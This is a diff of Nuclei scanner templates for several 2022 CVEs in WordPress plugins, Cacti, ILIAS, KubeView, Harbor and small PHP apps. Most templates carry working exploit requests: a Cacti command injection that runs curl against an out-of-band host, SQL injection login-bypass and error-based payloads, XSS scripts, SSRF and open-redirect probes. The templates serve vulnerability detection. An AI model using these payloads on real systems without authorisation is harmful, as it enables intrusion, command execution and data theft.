100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45362.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45362.yaml @@ -1,29 +1,41 @@ id: CVE-2022-45362 info: - name: Paytm Payment Gateway Plugin <= 2.7.0 Server Side Request Forgery (SSRF) + name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery author: theamanrawat - severity: high - description: | - Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information. + severity: medium + description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45362 + - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 cve-id: CVE-2022-45362 + cwe-id: CWE-918 + epss-score: 0.00177 + epss-percentile: 0.54919 + cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true + max-request: 1 + vendor: paytm + product: payment_gateway + framework: wordpress tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm -requests: +http: - raw: - | GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: interactsh_protocol @@ -38,3 +50,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100a606fdab9141a48eca5d7f8c40acd7f3ba3028d4d72dc00349a20faed5122a37022100b040277863f3df37d504e8dd431bd931484d0f7c9344cc658e8926bf3b62cb23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45365.yaml b/nuclei-templates/CVE-2022/CVE-2022-45365.yaml index 3331e819c8..7918ee902b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45365.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45365.yaml @@ -12,16 +12,23 @@ info: - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability - https://wordpress.org/plugins/stock-ticker/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45365 + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-45365 cwe-id: CWE-79 + epss-score: 0.00064 + epss-percentile: 0.26193 + cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 1 + vendor: urosevic + product: stock_ticker + framework: wordpress publicwww-query: "/wp-content/plugins/stock-ticker/" - tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss http: - raw: @@ -49,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220551f99c4f7c24a72cec95764b5d7e2b82a30fca070b2fdfa2501ea1c7d5a8bfc0220646804689406b49e700190614272ddda500f1ad274e7b8939a2e3589b17f0984:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022046a2c0fe907c58a9b3874b212d37ff610222781cef5966b7b7b95dd4e0f16b7902210081f249fa4a02e7e56036f9e4c8e11172e9948b3236b1a137878fd87c08f037dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45805.yaml b/nuclei-templates/CVE-2022/CVE-2022-45805.yaml index 12a8d06bf9..7b9cc20217 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45805.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45805.yaml @@ -6,19 +6,22 @@ info: severity: critical description: | WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: Update to version 2.7.7 or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45805 - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability?_s_id=cve + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45805 cwe-id: CWE-89 - epss-score: 0.00547 - epss-percentile: 0.74842 + epss-score: 0.00486 + epss-percentile: 0.75524 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: paytm product: payment_gateway framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm http: - raw: @@ -48,4 +51,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and -# digest: 4a0a00473045022100ffaacf3f04fe9173625c027fac582b9fe71f6603cfa1e7337c9aed6c6699a316022053594c5922029f30b090ccd3a974802358da4ac9922903ef06fe9008a154bd6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45835.yaml b/nuclei-templates/CVE-2022/CVE-2022-45835.yaml index aa3f9f402a..20b4393803 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45835.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45835.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server. remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf @@ -17,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-45835 cwe-id: CWE-918 - epss-score: 0.00404 - epss-percentile: 0.70812 + epss-score: 0.00359 + epss-percentile: 0.71627 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220503fb416a4eec57f83c66b12b0662c6ca82d71e507f383b389018325fbd916fa022100fb0c08a6227aa3c6754a77427dc34ff6e85c46e3cdcae56d7a525178a3ae6728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45917.yaml b/nuclei-templates/CVE-2022/CVE-2022-45917.yaml index 07b78e4a41..3c988bbd4b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45917.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45917.yaml @@ -1,35 +1,47 @@ id: CVE-2022-45917 info: - name: ILIAS eLearning platform <= 7.15 - Open Redirect + name: ILIAS eLearning <7.16 - Open Redirect author: arafatansari severity: medium description: | - ILIAS before 7.16 has an Open Redirect + ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability. reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html - https://seclists.org/fulldisclosure/2022/Dec/7 - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/ - https://github.com/advisories/GHSA-hf6q-rx44-fh6j + - https://nvd.nist.gov/vuln/detail/CVE-2022-45917 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-45917 cwe-id: CWE-601 + epss-score: 0.00221 + epss-percentile: 0.60222 + cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: ilias + product: ilias shodan-query: http.html:"ILIAS" - verified: "true" - tags: redirect,packetstorm,seclists,cve,cve2022,ilias + tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss -requests: +http: - method: GET path: - - "{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com" - - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com" + - "{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me" + - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me" stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' +# digest: 4a0a00473045022074c907eb4d6662a485c5cf6a20275f49eb358e805470537fa2dbc2bce50294bf022100ba0bf38c3ae8f7f5c83e2be6e7139d53450397f272542f5ab8fb570c876547cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45933.yaml b/nuclei-templates/CVE-2022/CVE-2022-45933.yaml index c3a7e4cbb7..8e3f8ca4de 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45933.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45933.yaml @@ -6,21 +6,31 @@ info: severity: critical description: | KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933). reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 - https://nvd.nist.gov/vuln/detail/CVE-2022-45933 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 - cwe-id: CWE-287 + cwe-id: CWE-306 + epss-score: 0.00908 + epss-percentile: 0.82406 + cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: kubeview_project + product: kubeview shodan-query: http.title:"KubeView" - verified: "true" - tags: cve,cve2022,kubeview,kubernetes,exposure + tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project -requests: +http: - method: GET path: - "{{BaseURL}}/api/scrape/kube-system" @@ -38,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46020.yaml b/nuclei-templates/CVE-2022/CVE-2022-46020.yaml index f75493d7e4..ef22ee023e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46020.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46020.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.01254 - epss-percentile: 0.84002 + epss-score: 0.02743 + epss-percentile: 0.90317 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true @@ -131,4 +133,4 @@ http: - name="app_name" value="(.*)" internal: true part: body -# digest: 4b0a00483046022100e8a4e045c4594830eef933527e09b083f52ea6a8b814e634b6875ef734cd783c022100c9b49b68fd0b2d8ecc4f2a0f08f1349a8bfc5b9034dd8542e160334e1e4cb0ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46071.yaml b/nuclei-templates/CVE-2022/CVE-2022-46071.yaml index a7ca50ca6d..b4b8c945ae 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46071.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46071.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46071/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46071 @@ -14,28 +18,32 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46071 cwe-id: CWE-89 + epss-score: 0.01454 + epss-percentile: 0.86393 + cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,sql,admin_bypass + max-request: 2 + vendor: helmet_store_showroom_site_project + product: helmet_store_showroom_site + tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project http: - raw: - | - POST /hss/classes/Login.php?f=login HTTP/1.1 + POST /classes/Login.php?f=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username='+OR+1%3D1+--+-&password=1234 - - | - GET /hss/admin/ HTTP/1.1 + GET /admin/ HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(body_2, "Helmet Store Showroom")' - - 'contains(body_2, "Adminstrator Admin")' + - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")' condition: and +# digest: 4b0a004830460221008a28b99414d2dfa37f05b900afd1ede85d6928122a9802832f8cdf91a3f64cb90221008f371160f0cb6a42a2d306a44bbfc66fe9117fac833e12ef28a93ab878e58bbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46073.yaml b/nuclei-templates/CVE-2022/CVE-2022-46073.yaml index 340c2afebc..723262ce8d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46073.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46073.yaml @@ -6,23 +6,33 @@ info: severity: medium description: | Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46073/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46073 + - https://www.youtube.com/watch?v=jT09Uiwl0Jo classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-46073 cwe-id: CWE-79 + epss-score: 0.00094 + epss-percentile: 0.38558 + cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,xss,helmet-store-showroom + max-request: 1 + vendor: helmet_store_showroom_project + product: helmet_store_showroom + tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project http: - - raw: - - | - GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers: - type: dsl @@ -31,3 +41,4 @@ http: - 'contains(body, "Helmet Store Showroom")' - 'contains(body, ">")' condition: and +# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46169.yaml b/nuclei-templates/CVE-2022/CVE-2022-46169.yaml index 9138c55c53..d3e88d94ac 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46169.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46169.yaml @@ -1,34 +1,48 @@ id: CVE-2022-46169 info: - name: Cacti <= 1.2.22 Unauthenticated Command Injection - author: Hardik-Solanki + name: Cacti <=1.2.22 - Remote Command Injection + author: Hardik-Solanki,j4vaovo severity: critical description: | - The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. + Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability. reference: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - https://www.cybersecurity-help.cz/vdb/SB2022121926 + - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 + - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 - cwe-id: CWE-285 + cwe-id: CWE-78,CWE-74 + epss-score: 0.96526 + epss-percentile: 0.9958 + cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: cacti + product: cacti shodan-query: title:"Login to Cacti" - verified: "true" - tags: cve2022,cve,auth-bypass,cacti + tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth +variables: + useragent: '{{rand_base(6)}}' -requests: +http: - raw: - | - GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1 + GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 unsafe: true + matchers-condition: and matchers: - type: word @@ -43,6 +57,12 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + - type: status status: - 200 +# digest: 4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46381.yaml b/nuclei-templates/CVE-2022/CVE-2022-46381.yaml index 497ef78338..ee261a0b05 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46381.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46381.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt - https://nvd.nist.gov/vuln/detail/CVE-2022-46381 + - https://github.com/amitlttwo/CVE-2022-46381 + - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-46381 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: niceforyou + product: linear_emerge_e3_access_control_firmware shodan-query: http.html:"Linear eMerge" - tags: cve,cve2022,xss,emerge,linear + tags: cve,cve2022,xss,emerge,linear,niceforyou -requests: +http: - method: GET path: - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/>' @@ -36,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/06 +# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46443.yaml b/nuclei-templates/CVE-2022/CVE-2022-46443.yaml index c4514bcab3..0fa198b5eb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46443.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46443.yaml @@ -6,17 +6,31 @@ info: severity: high description: | Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46443/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46443 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-46443 cwe-id: CWE-89 + epss-score: 0.05592 + epss-percentile: 0.93095 + cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,bangresto,sql + max-request: 2 + vendor: bangresto_project + product: bangresto + tags: cve,cve2022,bangresto,sqli,bangresto_project +variables: + num: "999999999" + http: - raw: - | @@ -25,19 +39,16 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{username}}&password={{password}} - - | POST /bangresto-main/staff/insertorder.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; - itemID[]=1&itemqty[]=(SELECT CONCAT(CONCAT(0x716a7a6b71,(CASE WHEN (1964=1964) THEN 0x31 ELSE 0x30 END)),0x7178717a71))&sentorder=Sent to kitchen + itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen - cookie-reuse: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code == 302' - - 'contains(body, "inserted")' - - 'contains(body, "updated")' - condition: and + - type: word + words: + - '{{md5({{num}})}}' +# digest: 4a0a00473045022100a3a16c285bb2bbd0ca79228c15a194013e67e2f1d1e2429058ff03750383e808022062c6d347e89f8c3a09499dbc165cb56c864338da5d2dd6976f9a776f7dcef0c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46463.yaml b/nuclei-templates/CVE-2022/CVE-2022-46463.yaml index bb6a3ffcc9..142020dcbe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46463.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor. remediation: | Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://github.com/Vad1mo - https://github.com/lanqingaa/123/blob/main/README.md - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d + - https://github.com/lanqingaa/123 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-46463 cwe-id: CWE-306 - epss-score: 0.01786 - epss-percentile: 0.86525 + epss-score: 0.01473 + epss-percentile: 0.86471 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,22 +30,23 @@ info: vendor: linuxfoundation product: harbor shodan-query: http.favicon.hash:657337228 - tags: cve,cve2022,harbor,auth-bypass,exposure + tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation http: - method: GET path: - "{{BaseURL}}/api/v2.0/search?q=/" - - "{{BaseURL}}/api/v2.0/users/current" matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body_1, "repository_name")' - - 'contains(body_1, "project_name")' + - type: word + part: body + words: + - "repository_name" + - "project_name" condition: and - - type: dsl - dsl: - - '!contains(body_2, "UNAUTHORIZED")' + - type: status + status: + - 200 +# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46888.yaml b/nuclei-templates/CVE-2022/CVE-2022-46888.yaml index 8a8861fbf4..397e6d5a06 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46888.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46888.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46888 cwe-id: CWE-79 - epss-score: 0.00089 - epss-percentile: 0.37731 + epss-score: 0.00099 + epss-percentile: 0.40602 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a3dfbb763339ab7600b149a363bfd71ea686c3f6d334c4cdcbe8f2085443d0e02204351fb7b62b842401f1c59beb44c717ab03fc07bf6261df3006d3e509629fcfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 